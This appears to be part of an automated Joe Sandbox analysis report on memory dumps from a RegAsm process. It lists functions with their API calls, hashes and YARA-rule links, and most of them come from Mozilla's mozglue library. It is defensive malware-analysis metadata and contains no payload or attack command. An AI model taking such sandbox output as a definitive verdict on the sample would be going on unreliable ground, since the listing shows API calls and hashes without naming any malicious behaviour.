Instruction ID: 7fac0f62cf2577a5a8d57f6ab71485126a571a4460cd7af8d0bbaabf91a59925
Opcode Fuzzy Hash: 7ced90a649ff221f7bde020ab2f4116feee36ff5ac8d8cfbed5ae13c3b06d1e2
Instruction Fuzzy Hash: EA712D71A40119ABCF01FFA6DE469DDB775AF04309F610026F500B70A1DBB8AE898B98

Function 6C07BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C07BE49), ref: 6C07BEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C07BEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C07BE49), ref: 6C07BF38
RtlReAllocateHeap.NTDLL ref: 6C07BF83
RtlFreeHeap.NTDLL ref: 6C07BFA6

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: 7e750b551549dd057e219e5b96028d17cfd847769bd00c6c3663c20fa11ad43d
Instruction ID: ec671061cd1f7996d5191a14eb09b394bef0765c12bb07bfc1f63a956e43e36e
Opcode Fuzzy Hash: 7e750b551549dd057e219e5b96028d17cfd847769bd00c6c3663c20fa11ad43d
Instruction Fuzzy Hash: F2518271A002158FE728CF69CD80B9AB7E2FF88714F294639D51597B54D730F9068B94

Function 6C068E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C05B58D,?,?,?,?,?,?,?,6C08D734,?,?,?,6C08D734), ref: 6C068E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C05B58D,?,?,?,?,?,?,?,6C08D734,?,?,?,6C08D734), ref: 6C068EBF
free.MOZGLUE(?,?,?,?,6C05B58D,?,?,?,?,?,?,?,6C08D734,?,?,?), ref: 6C068F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C05B58D,?,?,?,?,?,?,?,6C08D734,?,?,?,6C08D734), ref: 6C068F46
free.MOZGLUE(?,?,?,?,6C05B58D,?,?,?,?,?,?,?,6C08D734,?,?,?), ref: 6C068F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C05B58D,?,?,?,?,?,?,?,6C08D734,?,?,?), ref: 6C068F8F

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 64edc71d4199c9e465c2ff80732b2f6649f43b45b118c1e486e007f0a44f00d1
Instruction ID: c5706717df60324649bddd9a6ec41ee849b7519dda56104750623296257311c4
Opcode Fuzzy Hash: 64edc71d4199c9e465c2ff80732b2f6649f43b45b118c1e486e007f0a44f00d1
Instruction Fuzzy Hash: 2751A5B5A012268FEB14CF55D88076E73F6FF4A318F15062AD916ABB40E731F905CB91

Function 6C0260E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C025FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0260F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C025FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C026180
free.MOZGLUE(?,?,?,?,6C025FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C026211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C025FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C026229
free.MOZGLUE(?,?,?,?,6C025FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C02625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C025FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C026271

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: e64c932ba027ec017aec0e7360cfea2bcd7b159b6ec3cc32f30bf11b6ca8e4bd
Instruction ID: 162384d0b9afbcaa5b8e3074a4c85588593f23ac17f82867ebb1d1a37fbe35f6
Opcode Fuzzy Hash: e64c932ba027ec017aec0e7360cfea2bcd7b159b6ec3cc32f30bf11b6ca8e4bd
Instruction Fuzzy Hash: D1518CB1A006068FEB14CFA8D8907AEB7F5EF49308F240439C616D7751EB39B958CB61

Function 6C0627E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C062620,?,?,?,6C0560AA,6C055FCB,6C0579A3), ref: 6C06284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C062620,?,?,?,6C0560AA,6C055FCB,6C0579A3), ref: 6C06289A
free.MOZGLUE(?,?,?,6C062620,?,?,?,6C0560AA,6C055FCB,6C0579A3), ref: 6C0628F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C062620,?,?,?,6C0560AA,6C055FCB,6C0579A3), ref: 6C062910
free.MOZGLUE(00000001,?,?,6C062620,?,?,?,6C0560AA,6C055FCB,6C0579A3), ref: 6C06293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C062620,?,?,?,6C0560AA,6C055FCB,6C0579A3), ref: 6C06294E

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 8e38efcad25d40df120894308a243d26e007a0afe3014aa03d3dad348dda149c
Instruction ID: 1890ba9f34d7b3a6633f771e0b092b7102fb7ab57340eaeb8803cf3a839ebd3c
Opcode Fuzzy Hash: 8e38efcad25d40df120894308a243d26e007a0afe3014aa03d3dad348dda149c
Instruction Fuzzy Hash: A44190B1A013068FEB14CF69D88876A77F6BB89308F250939D557EBB40E731E904CB61

Function 6C01CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C09E784), ref: 6C01CFF6
LeaveCriticalSection.KERNEL32(6C09E784), ref: 6C01D026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C01D06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C01D139

Strings

MOZ_CRASH(), xrefs: 6C01D187

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: 08f3c9e8aec782bacb7220a1a9af28d7ea6771b5f8df8ba08fee6a4ad9f5e027
Instruction ID: f88c8165884cda93196a3836dfa00b71e69b7d897c5c8d2e5696a1e3a029243c
Opcode Fuzzy Hash: 08f3c9e8aec782bacb7220a1a9af28d7ea6771b5f8df8ba08fee6a4ad9f5e027
Instruction Fuzzy Hash: 09419372B053169FDB16CEAD8C9436EB6F4FB49714F140139E928E7B84DBA19D008BD1

Function 6C014DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C014E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C014E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C014EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C014F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C014F1E

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: b659e0e48b6dcde3cc88f6af3b8f8af37b659a42af29309e83581ffdf2d0984a
Instruction ID: 83b736eb96c0b6b198b1583142e80b10b1c64c2ba59671878f976219c2732148
Opcode Fuzzy Hash: b659e0e48b6dcde3cc88f6af3b8f8af37b659a42af29309e83581ffdf2d0984a
Instruction Fuzzy Hash: 1041DF71608701AFC705CFA9C480A5BF7E4BF89348F108A2DF46697B61DB30E958CB91

Function 6C02C150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C02C1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C02C1DC

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: df9d8ce486d35f0d55eedb1fde79de687fe8c83df541dd8d7bca564cbb99676a
Instruction ID: d32fa7b3b9810eeef7ee4edcd15bd99103953aa87d698d3d27c2d4a68725585f
Opcode Fuzzy Hash: df9d8ce486d35f0d55eedb1fde79de687fe8c83df541dd8d7bca564cbb99676a
Instruction Fuzzy Hash: 8441B3B1D083508FE710DF68C58178AB7F4BF86708F51865EE9989B712E734E948CB92

Function 6C07A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C09F770), ref: 6C07A858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C07A87B

Part of subcall function 6C07A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C07A88F,00000000), ref: 6C07A9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C07A8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C07A90C
LeaveCriticalSection.KERNEL32(6C09F770), ref: 6C07A97E

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 0d040ada105807a90098a37af24a43ca1aa866784cdd617e0ff43472387346d9
Instruction ID: ebb6dc9d39b10360db67a33e6684d8ba3a2c782c929e0d8493e684c1e9272500
Opcode Fuzzy Hash: 0d040ada105807a90098a37af24a43ca1aa866784cdd617e0ff43472387346d9
Instruction Fuzzy Hash: 4B4192B0E002448FDB14DFA4D845BDEB7B5FF08324F109629E816AB791D731E945CBA1

Function 6C021530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C02152B,?,?,?,?,6C021248,?), ref: 6C02159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C02152B,?,?,?,?,6C021248,?), ref: 6C0215BC
moz_xmalloc.MOZGLUE(-00000001,?,6C02152B,?,?,?,?,6C021248,?), ref: 6C0215E7
free.MOZGLUE(?,?,?,?,?,?,6C02152B,?,?,?,?,6C021248,?), ref: 6C021606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C02152B,?,?,?,?,6C021248,?), ref: 6C021637

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 402aa9da79b8915c2e6841787d4354d9dd19d01590f02a2e3104f4d61e771359
Instruction ID: 52ee95e0c264fa4dba44b2e44d3ef7b502bb02ade1e928197bfe4b5fc35f2fbe
Opcode Fuzzy Hash: 402aa9da79b8915c2e6841787d4354d9dd19d01590f02a2e3104f4d61e771359
Instruction Fuzzy Hash: AC313872A001109BCB188F78D854A6E73E9BF853747280B6CE827DBBD4EB35ED018791

Function 6C07AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C08E330,?,6C03C059), ref: 6C07AD9D

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C08E330,?,6C03C059), ref: 6C07ADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C08E330,?,6C03C059), ref: 6C07AE01
GetLastError.KERNEL32(?,00000000,?,?,6C08E330,?,6C03C059), ref: 6C07AE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C08E330,?,6C03C059), ref: 6C07AE3D

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: b8719bed1f7ea232303ba46f5297740ff17cad819b9334033fb70feb226fd4d1
Instruction ID: 6547a91130a74a0ce6f636f089842b57b65551f1f9ff0d096161dc4699c7b1c1
Opcode Fuzzy Hash: b8719bed1f7ea232303ba46f5297740ff17cad819b9334033fb70feb226fd4d1
Instruction Fuzzy Hash: 1C3150B1A012159FDB24DF798C44BABB7F8EF49614F158829E85AD7700EB34E804CBA4

Function 6C075EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C08DCA0,?,?,?,6C04E8B5,00000000), ref: 6C075F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C04E8B5,00000000), ref: 6C075F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C04E8B5,00000000), ref: 6C075F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C04E8B5,00000000), ref: 6C075F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C04E8B5,00000000), ref: 6C075FD6

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 12a4a6b8674a24e10d85dbfb317d899dc5bab76d2d5a6707b15052691cc40f3a
Instruction ID: 0bb7f36cd790f4de3d5b1ffcaa7d5bec954804e0e45cb87e4f47a17dcbbb0100
Opcode Fuzzy Hash: 12a4a6b8674a24e10d85dbfb317d899dc5bab76d2d5a6707b15052691cc40f3a
Instruction Fuzzy Hash: 20312C383016108FD724CF29C898F6AB7F5FF89329BA44558E5568BBA5CB31EC41CB90

Function 6C0139A0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C09E744,6C077765,00000000,6C077765,?,6C036112), ref: 6C0139AF
LeaveCriticalSection.KERNEL32(6C09E744,?,6C036112), ref: 6C013A34
EnterCriticalSection.KERNEL32(6C09E784,6C036112), ref: 6C013A4B
LeaveCriticalSection.KERNEL32(6C09E784), ref: 6C013A5F

Strings

\l, xrefs: 6C013A02

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: \l
API String ID: 3168844106-2103155860
Opcode ID: fc5caa73468b39b498297839a68f27c579486bc1bcaf44258675a8ed5f4201ca
Instruction ID: 9e413dc937745dff74dd7a88ec0fc30b5d7349fae7f859576e74cc1341b3e6ca
Opcode Fuzzy Hash: fc5caa73468b39b498297839a68f27c579486bc1bcaf44258675a8ed5f4201ca
Instruction Fuzzy Hash: B821D3327096018BC7149FA6C445B2AF3F5FB897247281529D57583F50DB31AD058BC2

Function 6C01B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C01B532
moz_xmalloc.MOZGLUE(?), ref: 6C01B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C01B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C01B57E
free.MOZGLUE(00000000), ref: 6C01B58F

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 8d9cc9319a4fb236ee020ef0ff9268d21d6e913858325528d448232473bc5a95
Instruction ID: 05f8f9f42726e02548efd54807858a0a375048b554ea4015cac8bee3275220bd
Opcode Fuzzy Hash: 8d9cc9319a4fb236ee020ef0ff9268d21d6e913858325528d448232473bc5a95
Instruction Fuzzy Hash: BF21B4B1A042059BDB008FA9CC40BAEFBF9FF85318F284129E918DB751E776D951C7A1

Function 6C01B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C01B7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C01B808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C01B82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C01B840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C01B849

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: 0ba9d6ea45b5ad316e3ab1f4f0f78a590bf564fec5096673685dd12429fcc7c5
Instruction ID: 8c8778632b32b7fa56809e484cea74558c1ec8d2c38ec07817f51b24e3b76a5a
Opcode Fuzzy Hash: 0ba9d6ea45b5ad316e3ab1f4f0f78a590bf564fec5096673685dd12429fcc7c5
Instruction Fuzzy Hash: F52148B0E042099FDF04DFA9C8856BEBBF4EF49714F148129E806A7700E731A944CBA0

Function 6C076E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C076E78

Part of subcall function 6C076A10: InitializeCriticalSection.KERNEL32(6C09F618), ref: 6C076A68
Part of subcall function 6C076A10: GetCurrentProcess.KERNEL32 ref: 6C076A7D
Part of subcall function 6C076A10: GetCurrentProcess.KERNEL32 ref: 6C076AA1
Part of subcall function 6C076A10: EnterCriticalSection.KERNEL32(6C09F618), ref: 6C076AAE
Part of subcall function 6C076A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C076AE1
Part of subcall function 6C076A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C076B15
Part of subcall function 6C076A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C076B65
Part of subcall function 6C076A10: LeaveCriticalSection.KERNEL32(6C09F618,?,?), ref: 6C076B83

MozFormatCodeAddress.MOZGLUE ref: 6C076EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C076EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C076EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C076EFF

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: ab75b13c56e2df04fb493ce01faf039bbd76403e6f5a98a9677171a494cb166d
Instruction ID: 719934afa1fe9f7594b58f96ab2effb8994e2448584b00f2547d255c8ceb3479
Opcode Fuzzy Hash: ab75b13c56e2df04fb493ce01faf039bbd76403e6f5a98a9677171a494cb166d
Instruction Fuzzy Hash: EB219271A042199FDB14CF69D88569E77F5FF84308F044039E80A97241DB709A588FA6

Function 00425713 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00425721
_free.LIBCMT ref: 00425734

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
